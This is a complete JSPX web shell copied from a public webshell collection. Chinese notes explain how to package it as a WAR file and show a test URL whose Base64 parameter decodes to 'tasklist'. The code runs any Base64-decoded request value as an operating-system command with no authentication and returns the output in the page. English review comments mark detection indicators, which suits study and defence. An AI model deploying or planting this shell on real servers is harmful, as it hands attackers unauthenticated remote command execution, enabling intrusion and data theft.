webshell
https://github.com/tennc/webshell/blob/master/jspx/cmd.jspx
使用测试
war 包部署的话只要先用 zip 压缩再把 zip 后缀名改成 war 就行了。
http://127.0.0.1:8080/x/b64_cmd.jspx?str=dGFza2xpc3Q=
上面 URL 中 str 参数的值（dGFza2xpc3Q=）经 Base64 解码后为：tasklist
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="2.0">
<!--
  Analysis notes: this JSP document is a command-execution web shell. It takes the
  request parameter "str", Base64-decodes it, runs the result as an operating-system
  command via Runtime.exec, and writes the command's standard output into the HTTP
  response. Nothing in the page checks who the caller is.
  Review and detection points visible in this file:
    * a JSP/JSPX file that imports sun.misc.BASE64Decoder and calls
      Runtime.getRuntime().exec on a value taken from the request;
    * requests to a .jspx resource whose "str" value is Base64 text (decode it during
      triage to recover the command that was run);
    * the servlet container's JVM spawning child processes.
-->
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.io.*"/>
<!-- sun.misc.BASE64Decoder is an internal JDK class, not the supported java.util.Base64 API; its import in a JSP is a useful static-scan indicator. -->
<jsp:directive.page import="sun.misc.BASE64Decoder"/>
<jsp:scriptlet><![CDATA[
// Untrusted input: getParameter returns the value from the query string or a form body.
// When it arrives in the query string, the Base64 value is normally recorded in access logs.
String tmp = pageContext.getRequest().getParameter("str");
// The only gate is "parameter present and non-empty"; there is no authentication or authorization check.
if (tmp != null&&!"".equals(tmp)) {
try{
// Decode the Base64 value; the bytes become a String using the platform default charset (none is specified).
String str = new String((new BASE64Decoder()).decodeBuffer(tmp));
// Dangerous sink: the decoded request data is executed as an OS command, as a child of the container's JVM process.
Process p = Runtime.getRuntime().exec(str);
// Only the child's standard output is read; its standard error stream is never consumed.
InputStream in = p.getInputStream();
// Output is decoded as GBK although the page declares UTF-8.
// NOTE(review): presumably chosen to match a Chinese-locale console; not confirmable from this file.
BufferedReader br = new BufferedReader(new InputStreamReader(in,"GBK"));
String brs = br.readLine();
while(brs!=null){
// Each output line is written to the response without HTML escaping, followed by a literal "</br>".
out.println(brs+"</br>");
brs = br.readLine();
}
}catch(Exception ex){
// Any exception thrown in the block is caught and its toString() is written to the response.
out.println(ex.toString());
}
}]]>
</jsp:scriptlet>
</jsp:root>